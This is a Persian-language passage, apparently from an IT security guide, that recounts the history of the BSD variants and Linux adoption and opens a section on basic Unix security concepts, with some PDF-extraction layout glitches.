ﺑﺎﻗﻴﻤﺎﻧﺪﻩ ﺩﺭ ﻫﺴﺘﺔ ﺍﺻﻠﻲ ﻛﻪ ﺷﺎﻣﻞ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ AT&Tﻣﻲﺷﺪﻧﺪ ﻭ ﻟﺬﺍ ﺩﺭ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻧـﺸﺪﻩ ﺑـﻮﺩ .ﺩﺭ ﭘـﺎﺋﻴﺰ ۱۹۹۱ﺑﻴـﻞ
ﺟﻮﻟﺘﻴﺰ ٢٥ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﭘﺮﺩﺍﺯﺷﮕﺮ ﺍﻳﻨﺘﻞ ﻧﻮﺷﺖ ﻭ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻋﻤﻠﻴﺎﺗﻲ ﺑﻪ ﻧﺎﻡ 360/BSDﭘﺪﻳﺪ ﺁﻭﺭﺩ.
ﻇﺮﻑ ﭼﻨﺪ ﻣﺎﻩ ﮔﺮﻭﻫﻲ ﺍﺯ ﺩﺍﻭﻃﻠﺒﺎﻥ ﻣﻮﻇﻒ ﺷﺪﻧﺪ ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﺗﻮﺳﻌﺔ ﺳﻴﺴﺘﻢ ﺗﺸﻜﻴﻞﺷﺪﻩ ﻛﺎﺭ ﻛﻨﻨﺪ ﻭ ﺍﻳﻦ ﺗﻼﺵ ﺁﻧﺎﻥ NetBSD
ﻧﺎﻣﮕﺬﺍﺭﻱ ﺷﺪ .ﻃﺮﺡ NetBSDﺑﺴﺮﻋﺖ ﺍﺯ ﻫﻢ ﭘﺎﺷﻴﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺍﻋﻀﺎ ﻣﻌﺘﻘﺪ ﺑﻮﺩﻧﺪ ﻛﻪ ﻫﺪﻑ ﺍﻭﻟﻴﺔ ﭘﺮﻭﮊﻩ ﺑﺎﻳﺪ ﺁﻧﻘﺪﺭ ﮔﺴﺘﺮﺵ ﻳﺎﺑـﺪ ﻛـﻪ
ﺑﺘﻮﺍﻧﺪ ﺗﺎ ﺟﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﺪ ﻭ ﺑﻪ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺩﺭ ﺯﻣﻴﻨﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺩﺍﻣﻪ ﺩﻫﺪ ،ﻭﻟﻲ ﺍﻋﺘﻘـﺎﺩ
ﮔﺮﻭﻩ ﺩﻳﮕﺮﻱ ﺍﺯ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﻣﻨﺎﺑﻊ ﺧﻮﺩ ﺭﺍ ﺗﺎ ﺁﻧﺠـﺎ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﻪ ﺑﻬﺘـﺮ ﺍﺟـﺮﺍ ﺷـﺪﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺭﻭﻱ
ﺑﺴﺘﺮ Intel/386ﻭ ﺳﺎﺩﻩﺗﺮ ﺷﺪﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻨﺪ .ﮔﺮﻭﻩ ﺩﻭﻡ ﺍﺯ ﮔﺮﻭﻩ ﺍﻭﻝ ﺟﺪﺍ ﺷـﺪ ﻭ ﭘـﺮﻭﮊﺓ FreeBSDﺭﺍ ﺷـﺮﻭﻉ
ﻛﺮﺩ .ﭼﻨﺪ ﺳﺎﻝ ﺑﻌﺪ ،ﻳﻚ ﮔﺮﻭﻩ ﺍﻧﺸﻌﺎﺑﻲ ﺩﻳﮕﺮ ﺍﺯ ﭘﺮﻭﮊﻩ NetBSDﺟﺪﺍ ﺷﺪ .ﺍﻳﻦ ﮔﺮﻭﻩ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭ ﺑﻮﺩ ﻛﻪ ﺍﻣﻨﻴﺖ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻋﺘﻤﺎﺩ ﻣـﻮﺭﺩ
ﺗﻮﺟﻪ ﻻﺯﻡ ﻗﺮﺍﺭ ﻧﮕﺮﻓﺘﻪﺍﻧﺪ .ﺗﺄﻛﻴﺪ ﺍﻳﻦ ﮔﺮﻭﻩ ﺭﻭﻱ ﺑﺮﺭﺳﻲ ﺩﻗﻴﻖ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﺋﻲ ﻣـﺸﻜﻼﺕ ﺑـﺎﻟﻘﻮﻩ ﺑـﻮﺩ .ﺁﻧﻬـﺎ ﺍﻗﺘﺒـﺎﺱ ﺍﺯ
ﻼ ﺑﺮﺭﺳﻲ ﻧﺸﺪﻩﺑﻮﺩﻧﺪ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻧﺪ .ﺍﻳﻦ ﮔـﺮﻭﻩ ﺳـﻮﻡ OpenBSD
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺟﺪﻳﺪ ﻭ driverﻫﺎ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻛﻴﻔﻴﺖ ﻛﺎﻣ ﹰ
ﻧﺎﻡ ﮔﺮﻓﺖ.
ﻣﺸﺎﻏﻞ Unixﺭﺍ ﺑﺮﮔﺰﻳﺪﻧﺪ
ﺑﻪ ﺩﻟﻴﻞ ﻗﻴﻤﺘﮕﺬﺍﺭﻱ ﺍﻧﺤﺼﺎﺭﻱ Microsoftﻭ ﺍﻣﻨﻴﺖ ﻭ ﻇﺮﺍﻓﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ،Unixﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺸﺎﻏﻞ ﺑﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺤـﺼﻮﻻﺕ
ﺗﺠﺎﺭﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Linuxﻋﻼﻗﻪﻣﻨﺪ ﺷﺪﻧﺪ .ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻟﻮﺍﺯﻡ ﺷﺒﻜﻪ ،ﭘﺎﻳﺪﺍﺭﻱ ﻭ ﺍﻣﻨﻴﺖ ﺑﺴﺘﺮ OpenBSDﺭﺍ ﻣﻄﻠﻮﺏ ﻳﺎﻓﺘﻨﺪ
ﻭ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﻃﺮﺣﻬﺎﻱ ﺧﻮﺩ ﺑﻜﺎﺭ ﺑﺮﺩﻧﺪ .ﭘﺎﻳﺪﺍﺭﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘﻴﺸﻨﻬﺎﺩﻱ BSDIﺑﺮﺍﻱ ﺳﺎﻳﺮ ﻛـﺎﺭﺑﺮﺍﻥ ﺗﺠـﺎﺭﻱ ﺑـﻮﻳﮋﻩ ﺑﻌـﻀﻲ ﺷـﺮﻛﺘﻬﺎﻱ
ﺍﺻﻠﻲ ﻣﻴﺰﺑﺎﻥ ﻭﺏ ﺍﻭﻟﻴﻪ ﺟﺬﺍﺏ ﺑﻮﺩ ﻭ ﺁﻧﺮﺍ BSD/OSﻧﺎﻣﻴﺪﻧﺪ .ﻫﻤﭽﻨﻴﻦ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﻣﺨﺘﻠﻒ BSD/OSﺭﺍ ﺑﻪ ﻟﺤﺎﻅ ﺷﺮﺍﻳﻂ ﻣﻨﺎﺳـﺐ
ﮔﻮﺍﻫﻴﻨﺎﻣﻪﺍﻱ ﻭ ﻧﻴﺰ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﺮﺍﻱ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﻭ ﺩﺍﻧﺸﻜﺪﻩ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻧﺪ.
ﺩﺭ ﻫﻤﻴﻦ ﺍﺛﻨﺎ ﺩﺭ ﻣﻴﺎﻥ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎﻱ ﺷﺨﺼﻲ ﺧﻮﺩ ﺑﻪ ﺩﻧﺒﺎﻝ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺟﺎﻳﮕﺰﻳﻦ ﺑﻮﺩﻧﺪ Linuxﺑﺴﻴﺎﺭ ﻣﺘـﺪﺍﻭﻝ ﺷـﺪ.
ﮔﺮﭼﻪ OpenBSDﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻧﺴﺒﺘﹰﺎ ﺍﻳﻤﻦﺗﺮ ﻭ ﭘﺎﻳﺪﺍﺭﺗﺮ ﺑﻮﺩ ،ﺍﻣﺎ Linuxﺍﺯ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﺘﻨﻮﻉﺗﺮﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛـﺮﺩ
ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﺮﺍﺣﻞ ﻧﺼﺐ ﻭ ﻛﺎﺭﻛﺮﺩﻥ ﺑﺎ ﺁﻥ ﺗﺎ ﺣﺪﻭﺩﻱ ﺁﺳﺎﻧﺘﺮ ﺑﻮﺩ.
ﻫﻤﺔ ﺍﻳﻦ ﻋﻼﻳﻖ ﺯﻣﺎﻧﻴﻜﻪ ﺑﺎ ﻣﺸﻜﻼﺕ ﻓﺰﺍﻳﻨﺪﻩ ﺑﺎﺯﺍﺭ ﺍﻧﺤﺼﺎﺭﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Microsoftﺩﺭ ﻫـﻢ ﺁﻣﻴﺨـﺖ ،ﺗﻮﺟـﻪ ﺩﻭ ﺷـﺮﻛﺖ IBMﻭ
Dellﻛﻪ ﻫﺮ ﺩﻭ ﺍﺯ Linuxﺍﻋﻼﻡ ﺣﻤﺎﻳﺖ ﺗﺠﺎﺭﻱ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ ﺭﺍ ﺟﻠﺐ ﻛﺮﺩ .ﺩﺭ ﻫﻤﻴﻦ ﺍﻳﺎﻡ ﺩﻭ ﺷﺮﻛﺘﻲ ﻛﻪ ﺗﻨﻬﺎ ﺑﻪ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ Linux
ﻣﻲﭘﺮﺩﺍﺧﺘﻨﺪ Redhat -ﻭ - VA Linuxﺩﻭ ﻓﻘﺮﻩ ﺍﺯ ﻣﻮﻓﻖﺗﺮﻳﻦ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺍﻭﻟﻴﺔ ﻣﺮﺩﻣﻲ ﺩﺭ ﺗﺎﺭﻳﺦ ﺑـﻮﺭﺱ ﺳـﻬﺎﻡ ﺍﻳﺎﻟـﺖ ﻣﺘﺤـﺪﻩ ﺭﺍ
ﻧﺼﻴﺐ ﺧﻮﺩ ﻛﺮﺩﻧﺪ .ﻣﺪﺕ ﻛﻮﺗﺎﻫﻲ ﭘﺲ ﺍﺯ ﺁﻥ HPﺍﻋﻼﻡ ﻛﺮﺩ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ Linuxﺭﺍ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﺶ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ.
Bill Jolitz
25
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺗﺄﺛﻴﺮﺍﺕ ﻛﻠﻴﺪﻱ ﺩﻳﮕﺮ ﺩﺭ ﻧﻴﻤﺔ ﺩﻭﻡ ﺩﻫﺔ ۱۹۹۰ﺯﻣﺎﻧﻲ ﺍﺗﻔـﺎﻕ ﺍﻓﺘـﺎﺩ ﻛـﻪ ﻣﺤﻘﻘـﺎﻥ ﺩﺭ ﺁﺯﻣﺎﻳـﺸﮕﺎﻫﻬﺎﻱ ﻣﻠـﻲ ﻣﺨﺘﻠـﻒ ،ﺩﺭ ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﻭ
ﻫﻤﭽﻨﻴﻦ ﺩﺭ NASAﻛﺎﺭ ﺑﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﻮﺷﻪﺑﻨﺪﻱﺷﺪﻩ ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩﻧﺪ .ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﻮﺷﻪﺑﻨﺪﻱﺷـﺪﻩ ﺻـﺪﻫﺎ ﺭﺍﻳﺎﻧـﺔ ﺷﺨـﺼﻲ ﺗﻬﻴـﻪ
ﻣﻲﺷﻮﻧﺪ ،ﺩﺭ ﻗﻔﺴﻪﻫﺎ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ،ﻭ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﻣﺘﺼﻞ ﻣﻲﮔﺮﺩﻧﺪ .ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻣـﺴﺎﺋﻞ ﺑـﺰﺭﮒ ﺑﺠـﺎﻱ ﺍﺟـﺮﺍﻱ
ﺧﻴﻠﻲ ﺳﺮﻳﻊ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ،ﺑﻪ ﭼﻨﺪ ﻗﺴﻤﺖ ﻗﺎﺑﻞ ﻣﺪﻳﺮﻳﺖ ﺗﻘﺴﻴﻢ ﻣﻲﺷـﻮﻧﺪ ﻭ ﺑـﺼﻮﺭﺕ ﻣـﻮﺍﺯﻱ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻛﻨـﺎﺭ ﻫـﻢ ﺗﺤﻠﻴـﻞ
ﻣﻲﮔﺮﺩﻧﺪ .ﺍﻳﻦ ﺭﻭﺵ ﺍﮔﺮﭼﻪ ﺑﺮﺍﻱ ﻫﻤﺔ ﻣﺴﺎﺋﻞ ﻗﺎﺑﻞ ﻛﺎﺭﺑﺮﺩ ﻧﺒﻮﺩ ،ﺍﻣﺎ ﻏﺎﻟﺒﹰﺎ ﺑﻬﺘﺮ ﺍﺯ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺮﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻨﻔﺮﺩ ﺟﻮﺍﺏ ﻣﻲﺩﺍﺩ ﻭ ﻋـﻼﻭﻩ
ﺑﺮ ﺁﻥ ﻫﺰﻳﻨﺔ ﺑﺴﻴﺎﺭ ﻛﻤﺘﺮﻱ ﺻﺮﻑ ﺁﻥ ﻣﻲﺷﺪ .ﻳﻜﻲ ﺍﺯ ﺍﻭﻟﻴﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﺑﻮﺩ ﻭ Beowulfﻧﺎﻡ ﺩﺍﺷﺖ ،ﻣﺒﺘﻨﻲ ﺑﺮ
Linuxﺑﻮﺩ .ﺑﻪ ﺩﻟﻴﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺷﺪﻥ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﺗﻮﺳﻌﺔ ﻫﻤﻪﺟﺎﻧﺒﻪ ﺁﻥ ﺗﻮﺳﻂ ﺟﺎﻣﻌﺔ ﺍﺑﺮﺭﺍﻳﺎﻧﻪﺍﻱ Linux ،ﺑـﻪ ﺳـﺮﻋﺖ ﻣﻴـﺎﻥ
ﺳﺎﻳﺮ ﮔﺮﻭﻫﻬﺎﻱ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻛﻪ ﻣﺎﻳﻞ ﺑﻮﺩﻧﺪ ﻛﺎﺭﻱ ﻣﺸﺎﺑﻪ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ﭘﺨﺶ ﺷﺪ.
٢٦٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﻣﺮﻭﺯﻩ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺸﺎﻏﻞ ﻭ ﺁﺯﻣﺎﻳﺸﮕﺎﻫﻬﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﺑﺎ Linuxﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ .ﺁﻧﻬﺎ ﺍﺯ Linuxﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﻭﺏ،
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻭ ﺩﺭ ﻭﺳﻌﺖ ﻛﻤﺘﺮ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺑﺴﺘﺮ ﻋﻤﻮﻣﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﻭﻣﻴﺰﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻨـﺪ .ﻣـﺸﺎﻏﻞ
ﺑﺠﺎﻱ ﺧﺮﻳﺪ ﺍﺑﺮﺭﺍﻳﺎﻧﻪﻫﺎ ،ﺧﻮﺷﻪﻫﺎﻱ ﺑﺰﺭﮒ Linuxﺭﺍ -ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺴﺎﺋﻞ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺰﺭﮒ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺍﺟـﺮﺍﻱ ﻣـﻮﺍﺯﻱ ﺣـﻞ ﻛﻨﻨـﺪ -
ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﻧﺪ .ﺑﻪ ﻃﻮﺭ ﻣﺸﺎﺑﻪ ،NetBSD ،FreeBSDﻭ OpenBSDﺑﺨﻮﺑﻲ ﻣﻨﺎﺳﺐ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺩﻫـﺎ ﻫـﺴﺘﻨﺪ ﻭ ﺑـﻪ ﻣﻴـﺰﺍﻥ ﻭﺳـﻴﻊ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﺮﺍﺳﺎﺱ ﺷﻮﺍﻫﺪ ﻏﻴﺮ ﺭﺳﻤﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ Linuxﻧﺴﺒﺖ ﺑﻪ ﻫﺮ ﺳﻴـﺴﺘﻢ ﺩﻳﮕـﺮ ،ﺭﺷـﺪ ﻛـﺎﺭﺑﺮﺍﻥ ﺑﻴـﺸﺘﺮﻱ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻃﺒﻖ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻋﻼﻡﺷﺪﺓ ﺗﺠﺎﺭﻱ ﺍﺯ ﺟﻤﻠﻪ ﺭﻳﺴﻜﻬﺎﻱ ﺍﻋﻼﻡﺷﺪﻩ ﺗﻮﺳﻂ ﺷﺮﻛﺖ ،Sun Microsystemsﺑﻨﻈﺮ ﻣـﻲﺭﺳـﺪ
Linuxﻣﻮﺍﺯﻧﺔ ﺭﺷﺪ ﺑﻬﺘﺮﻱ ﺩﺭ ﺑﺎﺯﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ،ﺣﺪﺍﻗﻞ ﺑﻪ ﺩﻟﻴﻞ ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﻭ ﻛﺎﺭﺍﻳﻲ ،ﻣﺎ ﺍﺯ ﮔﻮﻧـﻪﻫـﺎﻱ ﺩﻳﮕـﺮ
BSDﻫﺎ ﺍﻧﺘﻈﺎﺭ ﻣﺤﻮ ﺷﺪﻥ ﻧﺪﺍﺭﻳﻢ؛ ﺯﻳﺮﺍ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﮔﺮﻭﻩﻫﺎﻱ BSDﻫﺎ ﺑﻪ ﺣﻴﺎﺕ ﺟﺪﺍﮔﺎﻧﺔ ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﻣﻲﺩﻫﻨﺪ ،ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ ﻛـﻪ ﺍﺯ
ﺳﻬﻢ ﺑﺎﺯﺍﺭ Linuxﺑﻬﺮﻩﺍﻱ ﺑﮕﻴﺮﻧﺪ.
ﻧﺴﺨﻪﻫﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Linuxﻭ BSDﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺗﻨﻬﺎ ﺑﺎ ﻳﻚ ﻓﻼﭘﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻧﺴﺨﻪﻫﺎ ﻛﻪ
ﺷﺎﻣﻞ picoBSD ،Trinixﻭ closedBSDﻫﺴﺘﻨﺪ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩﻫﺎﻳﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺍﻣﻨﻴﺖ ﺯﻳـﺎﺩ ﻻﺯﻡ ﺍﺳـﺖ ،ﺍﺯ ﺟﻤﻠـﻪ
ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ،ﺗﺮﻣﻴﻢ ،ﻭ ﻟﻮﺍﺯﻡ ﺷﺒﻜﻪ.
ﺍﻣﻨﻴﺖ ﻭ Unix
ﻫﻤﺎﻧﻨﺪ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺳـﺎﺱ ﺁﻧﻬـﺎ ﺑـﺮ ﭘﺎﻳـﺔ Microsoft Windows NTﺍﺳـﺖ Unix ،ﻳـﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﭼﻨـﺪﻛﺎﺭﺑﺮﻩ ٢٦ﻭ
ﭼﻨﺪﻭﻇﻴﻔﻪﺍﻱ ٢٧ﺍﺳﺖ .ﻣﻨﻈﻮﺭ ﺍﺯ ﭼﻨﺪﻛﺎﺭﺑﺮﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺩﺭ ﻳﻚ ﺯﻣﺎﻥ ﺍﻓﺮﺍﺩ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ.
ﭼﻨﺪﻭﻇﻴﻔﻪﺍﻱ ﻧﻴﺰ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﻫﺮ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ .ﻳﻜـﻲ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ
ﻃﺒﻴﻌﻲ ﭼﻨﻴﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺗﺪﺍﺧﻞ ﻛﺎﺭ ﭼﻨﺪ ﻧﻔﺮ )ﻳﺎ ﭼﻨﺪ ﺑﺮﻧﺎﻣﻪ( ﻣﺨﺘﻠـﻒ ﻛـﻪ ﺍﺯ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺑﻄـﻮﺭ ﻫﻤﺰﻣـﺎﻥ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ .ﺑﺪﻭﻥ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﺣﻔﺎﻇﺘﻲ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺧﻮﺩﺳﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﺩﻫـﺪ،
ﻣﻤﻜﻦ ﺍﺳﺖ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﭘﺎﻙ ﻛﻨﺪ ،ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﻞ ﻛﺎﺭ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻣﺨﺘﻞ ﻧﻤﺎﻳﺪ .ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﭼﻨـﻴﻦ
ﺳﻮﺍﻧﺤﻲ ،ﻧﻮﻋﻲ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﻤﻮﺍﺭﻩ ﺩﺭ ﻓﻠﺴﻔﻪ ﻃﺮﺍﺣﻲ Unixﺟﺎﻳﻲ ﺩﺍﺷﺘﻪ ﺍﺳﺖ.
ﺍﻣﻨﻴﺖ Unixﺗﺴﻬﻴﻼﺗﻲ ﺑﻴﺶ ﺍﺯ ﺣﻔﺎﻇﺖ ﺻﺮﻑ ﺍﺯ ﺣﺎﻓﻈﻪ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ Unix .ﺩﺍﺭﺍﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻣﻨﻴﺘﻲ ﻣﺠﻬﺰ ﺍﺳﺖ ﻛـﻪ ﺭﺍﻫﻬـﺎﻳﻲ
ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ ،ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﻨﺪ ،ﻭ ﺍﺯ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ ﺭﺍ ﻛﻨﺘـﺮﻝ
ﻣﻲﻛﻨﺪ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺯﻣﺎﻧﻴﻜﻪ ﺳﻴﺴﺘﻢ ﺩﺭﺳﺖ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩ ﺑﺎﺷﺪ ،ﺑﺪﻭﻥ ﺩﻗﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ ،ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﺍﺷﻜﺎﻝ ﺍﺳﺖ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﺪ ،ﺍﻳﻦ ﻣﻜﺎﻧﻴﺰﻣﻬﺎ ﻛﻤﻚ ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﻛﻨﻨﺪ .ﺗﻘﺮﻳﺒﹰﺎ ﺗﻤﺎﻡ ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻃﻲ ﺳﺎﻟﻬﺎﻱ ﻣﺘﻤﺎﺩﻱ ﺩﺭ Unixﭘﻴﺪﺍ ﺷﺪﻩﺍﻧـﺪ ﺭﻳـﺸﻪ ﺩﺭ
